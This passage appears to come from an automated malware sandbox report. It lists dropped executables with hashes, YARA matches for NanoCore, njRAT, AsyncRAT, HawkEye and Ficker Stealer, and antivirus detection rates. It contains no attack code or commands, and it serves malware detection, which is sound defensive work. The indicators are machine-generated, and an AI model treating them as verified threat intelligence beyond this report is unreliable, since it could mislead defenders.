                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:4
                                                                                                        Start time:18:00:38
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\healastounding.exe"
                                                                                                        Imagebase:0x900000
                                                                                                        File size:3733504 bytes
                                                                                                        MD5 hash:6FB798F1090448CE26299C2B35ACF876
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: ditekSHen
                                                                                                        • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\healastounding.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:18:00:43
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\Pluto Panel.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Pluto Panel.exe"
                                                                                                        Imagebase:0xf10000
                                                                                                        File size:913920 bytes
                                                                                                        MD5 hash:ED666BF7F4A0766FCEC0E9C8074B089B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.712472379.0000000007710000.00000004.00000001.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.712461562.0000000007700000.00000004.00000001.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Arnim Rupp
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: JPCERT/CC Incident Response Group
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:18:00:44
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\test.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\test.exe"
                                                                                                        Imagebase:0xda0000
                                                                                                        File size:46080 bytes
                                                                                                        MD5 hash:7E50B292982932190179245C60C0B59B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.701971433.0000000001354000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.703770994.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\test.exe, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\test.exe, Author: ditekSHen
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:18:00:50
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:549556 bytes
                                                                                                        MD5 hash:0FD7DE5367376231A788872005D7ED4F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_ficker_stealer, Description: Yara detected Ficker Stealer, Source: 00000007.00000002.468272297.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 29%, Metadefender, Browse
                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:8
                                                                                                        Start time:18:00:51
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\gay.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\gay.exe"
                                                                                                        Imagebase:0xd0000
                                                                                                        File size:37888 bytes
                                                                                                        MD5 hash:8EEDC01C11B251481DEC59E5308DCCC3
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\gay.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:9
                                                                                                        Start time:18:00:53
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Opus.exe"
                                                                                                        Imagebase:0x840000
                                                                                                        File size:208384 bytes
                                                                                                        MD5 hash:759185EE3724D7563B709C888C696959
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
